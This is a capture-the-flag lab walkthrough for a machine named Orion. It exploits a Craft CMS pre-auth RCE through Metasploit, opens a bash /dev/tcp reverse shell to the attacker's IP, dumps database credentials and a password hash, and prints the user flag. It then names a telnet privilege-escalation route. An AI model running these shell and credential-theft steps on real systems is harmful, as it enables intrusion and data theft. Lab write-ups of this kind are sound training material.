Overview

The machine starts by enumerating a vhost running Craft CMS that is vulnerable to an unauthenticated pre-auth RCE (CVE-2025-32432), exploiting it to get shell as www-data, reading leaked database credentials from environment variables to dump the users table and crack an admin's bcrypt password hash to get SSH access as user, then abusing a local GNU inetutils telnet privilege escalation via the USER environment variable to get shell as root

Enumeration

start with nmap enumeration

add the vhost to the hosts file

bash
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/orion]
└──╼ [★]$ echo '10.129.21.34 orion.htb' | sudo tee -a /etc/hosts
10.129.21.34 orion.htb

Port 80

ss_20260624_234019.png

fuzzing for directories returns an admin dashboard

CVE-2025-32432 to shell as www-data

it is craft cms 5.6.16 which is vulnerable to RCE ss_20260624_234355.png

so i will use the msfconsole module for it (there isn't good public exploits for it and no need to replicate it manually again)

shell
[msf](Jobs:0 Agents:0) exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > > set RHOSTS http://orion.htb/admin/login
RHOSTS => http://orion.htb/admin/login
[msf](Jobs:0 Agents:0) exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > > set LHOST 10.10.15.100
LHOST => 10.10.15.100
[msf](Jobs:0 Agents:0) exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > > run
[*] Started reverse TCP handler on 10.10.15.100:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Leaked session.save_path: /var/lib/php/sessions
[+] The target is vulnerable. Session path leaked
[*] Injecting stub & triggering payload...
[*] Sending stage (42137 bytes) to 10.129.21.34
[*] Meterpreter session 1 opened (10.10.15.100:4444 -> 10.129.21.34:39934) at 2026-06-25 03:40:06 -0400

shell

(Meterpreter 1)(/var/www/html/craft/web) >
(Meterpreter 1)(/var/www/html/craft/web) > shell
Process 1785 created.
Channel 0 created.

whoami
www-data

so reading the env files

shell
env
CRAFT_DEV_MODE=true
CRAFT_DB_DRIVER=mysql
USER=www-data
HOME=/var/www
CRAFT_APP_ID=CraftCMS--67912ad2-1f1b-4993-bfec-e64daa5c23ff
CRAFT_ENVIRONMENT=dev
CRAFT_ALLOW_ADMIN_CHANGES=true
CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PASSWORD=SuperSecureCraft123Pass!
CRAFT_DB_SCHEMA=
CRAFT_DB_USER=root
CRAFT_DISALLOW_ROBOTS=true
CRAFT_DB_PORT=3306
CRAFT_DB_DATABASE=orion
CRAFT_DB_TABLE_PREFIX=
PWD=/var/www/html/craft/web
PRIMARY_SITE_URL=http://orion.htb/
CRAFT_SECURITY_KEY=RRS86F6i2JQKdC6kfEI7frVxA47WVMx8

lets first get a proper shell

shell
ls /bin/nc
/bin/nc

nc version is kinda old

shell
nc 10.10.15.100 4444 -e bash
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
      [-m minttl] [-O length] [-P proxy_username] [-p source_port]
      [-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
      [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
      [destination] [port]

so I will use pipes and descriptors instead

shell
(Meterpreter 1)(/var/www/html/craft/web) > shell
Process 1796 created.
Channel 2 created.
bash -c "bash -i >& /dev/tcp/10.10.15.100/4444 0>&1"

Shell as adam

getting a shell back, lets connect to mysql

shell
mysql -h 127.0.0.1 -u root -p
Enter password: SuperSecureCraft123Pass!

show databases;
Database
information_schema
mysql
orion

listing all tables in the DB

there is a lot but the users table is always interesting, where we find a hashes to crack

shell
select * from users;
id photoId affiliatedSiteId active pending locked suspended admin username fullName firstName lastName email password lastLoginDate lastLoginAttemptIp invalidLoginWindowStart invalidLoginCount lastInvalidLoginDate lockoutDate hasDashboard verificationCode verificationCodeIssuedDate unverifiedEmail passwordResetRequired lastPasswordChangeDate dateCreated dateUpdated
1	NULL	NULL	1	0	0	0	1	admin	NULL	NULL	NULL	adam@orion.htb	$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS	2026-03-12 11:25:04	NULL	NULL	NULL	NULL	NULL	1NULL	NULL	NULL	0	2026-03-12 11:24:51	2026-03-06 11:24:45	2026-03-12

and it cracked

testing the creds for ssh we get access as adam

shell
adam@orion:~$ cat user.txt
3f0f07faa795ca47fdc7ac50b909e8e8
adam@orion:~$

Shell as root

listing ports reveals that telnet is running on system

shell
adam@orion:~$ ss -lntp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 10 127.0.0.1:23 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*
adam@orion:~$

getting its version

shell
adam@orion:~$ telnet --version
telnet (GNU inetutils) 2.7
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later < https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

this version was discovered to be vulnerable to LPE lately

and the exploitation is easy for this

Resources